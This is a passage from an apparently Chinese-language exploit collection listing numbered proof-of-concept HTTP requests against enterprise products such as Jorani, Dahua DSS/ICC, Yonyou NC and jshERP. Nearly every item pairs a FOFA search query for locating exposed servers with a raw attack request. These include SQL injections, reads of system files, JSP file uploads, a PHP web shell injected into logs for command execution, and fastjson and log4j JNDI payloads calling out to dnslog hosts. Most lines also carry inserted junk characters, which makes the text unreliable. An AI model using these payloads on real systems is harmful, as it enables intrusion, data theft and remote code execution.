FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台", g% n2 T, p* L, a
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
: C# @) i$ |4 n+ f& p( x0 YHost: 127.0.0.1. I9 x4 k# y5 h1 W/ p
Pragma: no-cache( `$ W) a" R& `5 V J3 \2 Y
Cache-Control: no-cache! p+ G! I% {* S" j
Upgrade-Insecure-Requests: 1& X6 Y* A+ ~, G, G. d" @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 b+ p7 E; }1 O7 r0 C" i# eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 C$ w: R# n- M$ w8 u9 @3 w) U
Accept-Encoding: gzip, deflate j4 U) g% K% w% U9 k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 E2 s' W h, i1 z& R) @
Connection: close6 C" u: t* |8 c8 O1 d+ P9 Q
" k* h4 }: M6 n' N* v
; ~, N/ N* V4 H* ^/ d+ l2 N12. Jorani < 1.0.2 远程命令执行
5 f. ~ ~$ @2 c# r0 o( ^FOFA:title="Jorani"
4 e: |! K; k6 h第一步先拿到cookie" P) v4 D+ q/ ^! Q
GET /session/login HTTP/1.1, V% \, Y3 v: X {
Host: 192.168.190.30
3 d6 ?$ C0 ?& Z9 V6 A9 bUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; z; k; Y9 Q" `( X5 {" m4 T
Connection: close
# \6 h" a# u7 o. E: O1 MAccept-Encoding: gzip S) o# }+ w5 d7 q5 h, m' F- w
" Y3 y- D( \7 Y9 c6 }1 m; L( _0 ~
响应中csrf_cookie_jorani用于后续请求 K( H$ S6 ^% J
HTTP/1.1 200 OK4 N# Y8 ~! V3 Y+ p
Connection: close) i0 Q! Q4 v" Y
Cache-Control: no-store, no-cache, must-revalidate, d& K* t) g* q+ c% [% g4 W
Content-Type: text/html; charset=UTF-8
/ F5 V- c6 D) U$ J7 oDate: Tue, 24 Oct 2023 09:34:28 GMT
2 B# C: }2 G; iExpires: Thu, 19 Nov 1981 08:52:00 GMT
2 r/ g0 c# {0 B, j% e8 P& fLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT4 n$ g% b+ \# }3 Y; ~
Pragma: no-cache* A' t; o4 v5 }. l+ u* {) z
Server: Apache/2.4.54 (Debian)) r9 [3 c O! v( g" r5 D
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
. I* P- B/ Q; o& OSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
8 Y* V3 I2 v& f" \Vary: Accept-Encoding
( T7 _# Z' q9 d( z. t
" C: F4 M- W! V' O+ e6 ?6 K
2 @* Y ~8 G. Z* P- QPOST请求,执行函数并进行base64编码6 a7 e8 l/ u( {
POST /session/login HTTP/1.1
* C8 G0 R% z0 N# Y. V& k8 tHost: 192.168.190.303 _" ?, ~' Z" z+ h+ c* D9 z, p7 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 b7 ?/ @( c) l" f% C
Connection: close( m, G7 y6 l( H" K# ?) e
Content-Length: 252
4 }- I7 O b4 R% i/ J' [Content-Type: application/x-www-form-urlencoded
I/ M0 d2 g% K5 eCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 y' i& a3 I. R$ O- h2 J+ J5 k
Accept-Encoding: gzip
. z5 u) t0 m; p; S+ h) m# o3 G* G; I
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor) A: I, P0 J; g, z
- L9 C% {$ q% B7 |' ^6 m* r" B& s( {) @6 l2 g8 E6 }6 z
" \4 S0 {2 C1 J% E6 h( M. c
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
" n8 y! X; a9 Y; D e c: HGET /pages/view/log-2023-10-24 HTTP/1.16 ~5 ]; q8 i1 C
Host: 192.168.190.30
5 u- e( o) M" a' iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, L% F5 C) u B2 R* S
Connection: close
) C; ]: e; Y5 G. ^* w1 PCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r. y3 O+ v! f: s) m& i
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
6 I8 p# B7 k2 S! MX-REQUESTED-WITH: XMLHttpRequest
. F% }8 ?9 S; b) C& ~Accept-Encoding: gzip
9 d L) Z0 B1 S' O8 c
( {3 s0 d! [% B1 A$ f! {! M' T! K0 q: j
13. 红帆iOffice ioFileDown任意文件读取8 m1 r& h) u- W% @: {) q' `+ j6 h
FOFA:app="红帆-ioffice"
$ `1 w# _; q4 \$ v5 J/ `8 q: Z7 OGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.17 k( f7 E2 `3 r2 p: r
Host: x.x.x.x$ [ x3 ]& c6 z D3 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 o/ d" F6 O. ^, [# b/ z
Connection: close9 U4 F: q" C5 Y3 m
Accept: */*
2 E" u: \- y. y7 _2 P4 h: \Accept-Encoding: gzip
7 y. C2 i6 d h0 k6 [+ i- c* Q4 {4 S- \ Z5 v. ~. k7 y8 f
+ n% ^" n4 T( Q
14. 华夏ERP(jshERP)敏感信息泄露4 |" ?1 }: d3 M [
FOFA:body="jshERP-boot"0 [$ Q& h- ?( D( e1 y d0 [$ L8 b# R) ]
泄露内容包括用户名密码7 j9 T) t$ C* l
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
4 @$ }' u8 V4 v( h4 r" bHost: x.x.x.x4 f& q% R8 d7 o1 r. m4 p# e- C5 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36. v% Y) m1 G; \8 y" C
Connection: close) Q, b2 K# T3 i# d9 I0 [
Accept: */*
4 e6 g; ^' I( z( u& dAccept-Language: en K) g0 H& [- ?% x6 `9 w( i
Accept-Encoding: gzip
8 e% T3 Y1 b4 D& r$ T, J
- O' O' `; W6 w8 e# s$ p: d4 m4 G' F* U$ n" @! K# B9 W0 f
15. 华夏ERP getAllList信息泄露4 c3 d* R0 Z- L3 Q
CVE-2024-04905 b# L5 l. G+ C# S p) _
FOFA:body="jshERP-boot"
; l6 S+ g3 D5 l' _泄露内容包括用户名密码
/ W w0 t' x" v9 Q# @5 }GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.17 _- u. F* J* A# z7 H2 O
Host: 192.168.40.130:100! B' f j" E$ a- f/ C& V0 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36; c& T9 T: j1 T9 \9 M5 g, ^
Connection: close
% \2 z9 ?2 f. \* @) @2 X! gAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* }% |2 K) o) a* F" w& E9 j
Accept-Language: en
6 X" ]$ M9 i* }* fsec-ch-ua-platform: Windows
& N: p3 e3 \; \( MAccept-Encoding: gzip7 p4 F$ t2 c2 r7 {" [1 F
% X" N" q1 A1 A% e
/ o* c% p$ l( s- i) ^1 X16. 红帆HFOffice医微云SQL注入. N$ b) T% @- u$ r
FOFA:title="HFOffice"- G3 k Z8 f2 d% g
poc中调用函数计算1234的md5值9 l) Z; Y0 r3 C# ~; j
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1) n' \5 ^0 J9 M: x
Host: x.x.x.x9 n. j4 @( t# C& s+ ~6 g! y0 m
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
) P# @+ S) x, V xConnection: close
+ g) E3 T+ {' `* U4 j' c" E1 I0 xAccept: */*
; x0 \$ }: _: t- x# ~/ ?Accept-Language: en
, ]3 R- I: s6 [Accept-Encoding: gzip
$ [, P5 V! q: j
L% O3 r# D' `; t5 n
. Y% G" t" M/ h$ u5 h* S1 n$ a) {17. 大华 DSS itcBulletin SQL 注入
" d/ X! K$ \' T, R6 fFOFA:app="dahua-DSS"& e' w6 q/ U! L) c& a6 M+ s
POST /portal/services/itcBulletin?wsdl HTTP/1.1. Z( P$ ?% Q9 s6 Y6 a1 E+ A
Host: x.x.x.x
. X) ]+ I$ ?2 m% u4 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 T% v: R- i1 W! ]/ q/ r) N
Connection: close
& m3 q8 q+ E# R8 N: P$ r0 D4 Y: C8 `) kContent-Length: 345
* w/ e; n4 ]# {. W6 ]# kAccept-Encoding: gzip1 [, L9 e8 _$ m+ v6 X0 D8 u3 m4 l
2 k2 M0 K1 B+ ]$ B% L* F" d<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>$ f9 ~! H& e; V$ B
<s11:Body>- s7 @9 C2 U1 V: R% D3 H2 q8 \
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>. T& ?! O* g% R I) t4 H* {
<netMarkings>
3 B! r$ f4 E4 Y (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=13 n8 r! f5 U- V
</netMarkings>
) }( D l' [4 X: Y _; x/ p& _ </ns1:deleteBulletin># J) l+ n7 [# g/ I z& `- R
</s11:Body>( f c. S3 g4 j8 |5 D
</s11:Envelope>
* E2 Z% ~! \* Y t5 ~" W, n2 x6 T1 s* Z$ y
* B+ M6 T9 q0 h, o9 h9 j* w, }/ O
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
7 L0 Z$ R5 {; X. [. BFOFA:app="dahua-DSS"/ M+ }. m$ Q& J( L
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.11 }# F; \. u' V4 @* j
Host: your-ip- k `9 \! ^ @$ q0 s b' w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! k& a' C3 e' @$ ^3 rAccept-Encoding: gzip, deflate
. L' N- s( O! J9 J; k' BAccept: */*7 g0 z6 j. x# i: x% K. R- X) W* G
Connection: keep-alive* L2 B1 z( J+ {% t! k
3 M7 _) _! ?" q. X0 L- f; p: D9 Q5 O7 v6 ^2 e- @: U
6 k# G; z2 ~- X1 H7 B. n* @19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& {/ K" ?1 b O. d0 R% J
FOFA:app="dahua-DSS"7 @5 o! }) J% F! g4 r7 F
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1) P& K: [8 R; M& t6 H0 N
Host:5 S/ N3 _: q1 ?; @+ X" u
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ } i5 j6 `+ VAccept-Encoding: gzip, deflate9 K( i3 x2 g# z1 x) V9 q
Accept: */*8 K ~. j2 e1 c
Connection: keep-alive
( \, P9 F& w1 e& O5 c6 O/ l% {0 o6 A$ p, I1 L9 s; j) V/ i
, w, S: n) S. Y: K( ^
20. 大华ICC智能物联综合管理平台任意文件读取8 G5 m5 v% [1 n1 `3 ]
FOFA:body="*客户端会小于800*"
- n5 T0 m: K& V4 S0 tGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1) f1 z9 i3 I: o) W( L# c
Host: x.x.x.x$ q$ D7 ?7 F( B# H4 D- `% c
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: p* O* Z2 Y- _9 l$ n+ H: `
Connection: close
- `* i" \) ~1 d/ Q( [% U/ oAccept: */* h# e1 Z; S3 l5 t8 X/ d
Accept-Language: en
4 q8 y' s, m( }; w$ f& ~Accept-Encoding: gzip( ~) e0 {" Y% a7 y1 _/ r- t/ o
# ^: H) k" e0 p! _, l4 B- p/ X6 P0 |) ~' q% n: @* [ s
21. 大华ICC智能物联综合管理平台random远程代码执行4 L# y _; } E& p
FOFA:icon_hash="-1935899595"
d" j# F4 j& _+ `* h9 O, EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1 O* v4 f' `( ^( y2 J3 Z
Host: x.x.x.x: q5 t, E1 X& J/ T+ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 `' U o. v. \: m4 i! RContent-Length: 161
2 Q& D; M2 h& d9 Q* ]! v& c9 \Accept-Encoding: gzip
' z* i- S# Q+ j+ x; G: A7 t, cConnection: close; d- q, f8 V: R% p8 [3 O
Content-Type: application/json;charset=utf-8
, u* H. A3 S. s3 z4 C1 I+ g, ]
: m4 U/ c& v; m& F, m+ x{
" W d6 P3 t2 {# f6 P2 e"a":{- s! r9 @4 [7 g4 ?4 T; S
"@type":"com.alibaba.fastjson.JSONObject",* P" l: w# Y/ u$ m
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
. ]: ?0 C$ V. B) Z" l+ j3 b, I" B3 o( Y }""* Z+ ? D* b: u; F5 x! E4 ^
}* m$ c) T, q' l! C0 C
4 u- ?0 A$ S# S# E e; k$ x1 `" Y3 s, ^% k8 t1 e: ^. L/ l
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
V! a9 U. K. @, H0 RFOFA:icon_hash="-1935899595"
/ F$ J. \& I' j, c: hPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1- U) L) L0 @0 h! a# g9 J+ O
Host: your-ip# g6 w0 j1 J$ Z$ i# F0 O! ^3 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- q( P5 O- Z! d, R9 W. ?' F
Content-Type: application/json;charset=utf-8% u- q. L4 f/ j4 M
" {; ^( ?9 x6 h5 n+ \{
! M0 {6 t. X4 B, |0 x"loginName":"${jndi:ldap://dnslog}"0 N) f2 f& D% ^8 G9 O& U9 r
}
6 P- ]3 F/ A4 a) I6 @
5 v+ P4 e. [8 D" O5 }, ^: T% }2 A' g x
9 a9 d9 d) ~ S( Q
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 N+ h; t6 Y7 ZFOFA:icon_hash="-1935899595"
7 p! \+ |- ~8 q% _2 O% DPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% P! P) \; {9 ?- T2 fHost: your-ip
% ]' R) C* v: R& |/ s _2 d" OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 G/ G, b# U7 z' @& q2 J! o VContent-Type: application/json;charset=utf-8$ v# }" K1 G" H! r
Accept-Encoding: gzip' G( g" X+ w* z1 H, v& r
Connection: close
5 ], m: L: @) @
7 n. T( k2 V, _: P5 V% Z' d( u{
! ~. U7 K8 U9 M% e$ r+ d" Z "a":{
+ q- n( g6 D& k( @, u "@type":"com.alibaba.fastjson.JSONObject",
8 U. [+ J$ ]) n$ f- V {"@type":"java.net.URL","val":"http://DNSLOG"}2 Z1 l5 v5 Z: ]/ X
}""
! {* ~. r8 S$ d) a2 p4 q( L2 \6 ^) Q}
, R+ |2 ?; T; p9 d! b7 h: U
* a" x3 k% H/ ?$ P% ?; i5 X5 q% ?: E8 a2 W
24. 用友NC 6.5 accept.jsp任意文件上传
. T, H4 e0 f9 {FOFA:icon_hash="1085941792"
% m, U' \8 B9 ?) {; D6 p; IPOST /aim/equipmap/accept.jsp HTTP/1.11 c/ }6 I, g( H+ D, Y
Host: x.x.x.x
1 B+ n3 W0 r" ^5 C, kUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36, W: f+ \# T! e' X3 x. i3 ?
Connection: close! m; S# ?' r6 p+ s* H& s
Content-Length: 449, \$ m! j: K- O' H
Accept: */*2 s( e2 p1 }# f8 ?; J
Accept-Encoding: gzip/ k- m2 k) |1 ^- t1 [
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: N @0 M2 _- p8 X5 p
$ ^* l4 y. Z/ `. b& H2 @
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: n7 s l ^5 P6 q5 f7 ?
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"0 N: ]) N" u4 Q3 y' p
Content-Type: text/plain
2 ]# l& [$ B, ?) [
' ^: m; ~) q8 x/ O0 V<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
4 L! Q: v6 {& R1 T) R3 x: F4 `-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: x, N" p- U! K7 m' f4 C* ^
Content-Disposition: form-data; name="fname"5 C9 e3 A: X$ [
( K4 p; \9 U4 m5 g9 ?' m
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp+ |" h. G7 n6 _, q3 M# J' [6 s
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
0 b# ~9 ?3 N8 I; l' Y Q, K8 H) F/ I& a/ z0 y
5 g; `5 k$ [& @5 A$ n25. 用友NC registerServlet JNDI 远程代码执行
8 N; G! h/ C0 B& W4 p% j; H6 I: XFOFA:app="用友-UFIDA-NC"8 i7 Y/ s. p7 x9 `2 w
POST /portal/registerServlet HTTP/1.1' }$ Z8 w c, d- { L
Host: your-ip
% O$ [' Q+ ]" K& ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- t) W/ b# T& R7 h# K" ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9! [0 u+ [: r6 C/ ?8 j" u
Accept-Encoding: gzip, deflate" N/ |& P3 @& t! O& g) B
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.68 \4 [; m1 ]8 f
Content-Type: application/x-www-form-urlencoded6 t- \( z, x9 z9 a' R0 B
8 K: O. b: L6 }
type=1&dsname=ldap://dnslog) l+ v+ j- A- I3 c
8 j% M* Q9 D4 l- ~; L
! U2 z, S) U. V" i9 M% Z- v5 f# m. v* ~7 h! \- Q# g2 h2 Q0 h
26. 用友NC linkVoucher SQL注入* s" N* w+ F/ Y# p: {
FOFA:app="用友-UFIDA-NC"
( W t' y# Y n* K* |# S/ p' a, {9 uGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1) [" U5 \! Y/ g2 Q: g
Host: your-ip
~' d4 n" R) |# q: M4 c) K. _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 S! c: D$ ^7 R' k" UContent-Type: application/x-www-form-urlencoded
7 a2 u8 J' E# N7 ~% iAccept-Encoding: gzip, deflate* _2 f5 S, V, C: i4 Z
Accept: */*0 d4 y( {3 @, K% F* g
Connection: keep-alive% h: z5 t/ }; ]1 i4 e
. I4 Y+ J0 d; |' D; B, Z5 U: j
c8 K7 @8 `) j, p5 o D# S27. 用友 NC showcontent SQL注入
/ H) R/ t8 {* x+ \7 ?FOFA:icon_hash="1085941792"
8 }: a+ h V/ N2 b L0 ^. MGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" ?5 N$ S% b W6 E( d: ?& ~* `
Host: your-ip8 k7 O2 ], W9 h% k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( e7 l! t6 j) X/ a/ CAccept-Encoding: identity
) H2 J: b Q& ]0 @- R) k& uConnection: close
/ U( E7 ?, x+ qContent-Type: text/xml; charset=utf-84 `4 R+ h6 |6 R
0 {3 A3 a! @; L0 p
) t) y2 B8 T( D& t3 Z28. 用友NC grouptemplet 任意文件上传, {) O( A. W3 V% l
FOFA:icon_hash="1085941792"
. L1 |- P* H( Q. ]! v7 ?POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
% v/ g& I+ o" q8 d5 \; d jHost: x.x.x.x0 X; g& W4 |) V" q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' B! i' L* s1 z) `Connection: close. i0 l; r2 a& ]9 A1 d7 M7 Z" v
Content-Length: 268- Y3 R M' |0 N$ s
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ y) X6 D3 t6 p% i9 r
Accept-Encoding: gzip
3 C: s$ J+ h. _* h# }. l0 P5 ~1 M2 @4 C) p: h4 \6 {8 K$ k
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk- W! n+ Y; Z" [: m2 m) A; L
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"/ i5 \* }( R& a; T; M
Content-Type: application/octet-stream6 s) ?( x9 c: Z# s1 x6 }9 R& ~
. A* M4 L& f6 G. Z4 ^: R<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>, B* }! Y: y5 c) b" h" {5 q
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
% @( S. a; X; h2 n. f8 m; a
9 v. b. @1 l1 p5 R; d7 e% |. Q2 _1 a- Y, K% m- U
/uapim/static/pages/nc/head.jsp, z2 m; v- r% }, l2 {: m3 B2 e
( G7 {$ }4 J+ {6 w1 |6 |9 c29. 用友NC down/bill SQL注入
# h% A0 h+ s7 n# G/ n# fFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
0 @2 ^9 a" L' u- L4 I# i3 uGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
K3 L* g) ?* E4 M) T% o) THost: your-ip+ h/ G! l1 l$ {7 d% v+ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, L- O5 O2 v& c$ w% m
Content-Type: application/x-www-form-urlencoded
. B2 [$ {; K% z: ^1 i# jAccept-Encoding: gzip, deflate7 f% W. f- `9 i
Accept: */*# Y" E( ]' q$ ~( t0 T
Connection: keep-alive
: N' a' N3 I M# t( G& O; j' ~' i& w; \+ ?. o% i8 r
+ y( W& A! E! ~3 y
30. 用友NC importPml SQL注入: p2 |9 H6 M7 f
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 J% M, F% f$ H( ~9 m0 K# \POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
: q( l) @% b N. P# I- S$ RHost: your-ip( j8 r c* A. G) w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( a" P( ?8 _3 j5 s" {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! h" C9 W% Z3 ]2 g" DConnection: close' C% j/ p6 L0 B I7 [
( o! m2 R+ L! `. C
------WebKitFormBoundaryH970hbttBhoCyj9V' u5 H+ q( H) o* ^$ _# O/ K7 L- T: \1 W
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
" ?0 ^8 Q% X2 w; J! hContent-Type: image/jpeg
0 z$ u5 w1 c. c' K7 R; k6 {+ G------WebKitFormBoundaryH970hbttBhoCyj9V--
- f2 B+ g3 e4 e
2 y& N% _9 y6 U' p) ], ]9 w( ~0 p7 ^2 L1 i' x# k
31. 用友NC runStateServlet SQL注入5 T7 u5 v4 K4 r! J3 U. x" H M& A
version<=6.5. w8 D/ D6 n, `7 q2 r$ o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif", W( B q& s. [& Q; R4 J
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.13 e( f7 {( S" E0 \
Host: host
5 U' M# `# a( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# \0 h2 c7 Y6 i: g& l- T; |. fContent-Type: application/x-www-form-urlencoded
5 ?/ f& }5 t* @0 y* r0 K c
) O6 i* w; c3 E
, ? T# U0 C5 m5 O4 Z32. 用友NC complainbilldetail SQL注入
# E: R# X5 ]. Xversion= NC633、NC65
# C* i" z0 o( k X" O% jFOFA:app="用友-UFIDA-NC"' s. V" S2 a* f- M4 t0 `
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1. |+ f ]% R3 ^+ D8 o) _
Host: your-ip" h% L" m5 v# A& h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 y* L+ ?$ O0 a- ]+ RContent-Type: application/x-www-form-urlencoded
+ U7 H( h0 W( N4 l; V% _/ GAccept-Encoding: gzip, deflate
; J% C. y( a2 t) n& w' m" G7 NAccept: */*3 x% U* D8 a, B! ^
Connection: keep-alive
+ x w2 E+ S: \) I% f2 d# F) d' F7 v& S1 n5 l/ j& d: ?
5 n" D8 c- H5 _, q# b3 s$ e9 O33. 用友NC downTax/download SQL注入
9 H: }4 ?8 j5 ]; hversion:NC6.5FOFA:app="用友-UFIDA-NC"
0 f' {5 w7 i3 k- t [GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 Q7 Z' W; y1 u! ]* mHost: your-ip
, m1 H) ?3 c7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# c! r% B- P0 } h0 n0 @! V9 [
Content-Type: application/x-www-form-urlencoded
% Z/ Q3 n6 h8 R n9 N; X( IAccept-Encoding: gzip, deflate
* B/ \7 l; b; H+ ZAccept: */*4 O8 v1 R) s6 _. s
Connection: keep-alive! G* z: q; d; m
5 W6 `4 m% Z' Q2 V# S c
& F3 p9 @6 _( y) [. Q$ P. @
34. 用友NC warningDetailInfo接口SQL注入6 x" K7 d0 c# a( ?
FOFA:app="用友-UFIDA-NC"( K: E; h. S: H9 g4 U% W
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1! |2 D& {# q6 p. [
Host: your-ip# }4 e: p8 d( r# h6 B; Q2 r0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 l; U6 m& }8 _2 P+ H
Content-Type: application/x-www-form-urlencoded& f# @% V5 ?: x1 ^* d2 s4 }
Accept-Encoding: gzip, deflate& U( M; H2 F9 R; z+ R; O9 {1 l
Accept: */*
: c6 K& J: ]$ [8 \6 EConnection: keep-alive) E0 P" R: v5 U/ \! Z6 v s R( u
/ r( o# k( X8 j0 @( x* T9 T, c- i! k
35. 用友NC-Cloud importhttpscer任意文件上传
4 |: g9 f# ?& q5 C) t DFOFA:app="用友-NC-Cloud"3 }& w, I( [3 ]/ p7 U
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
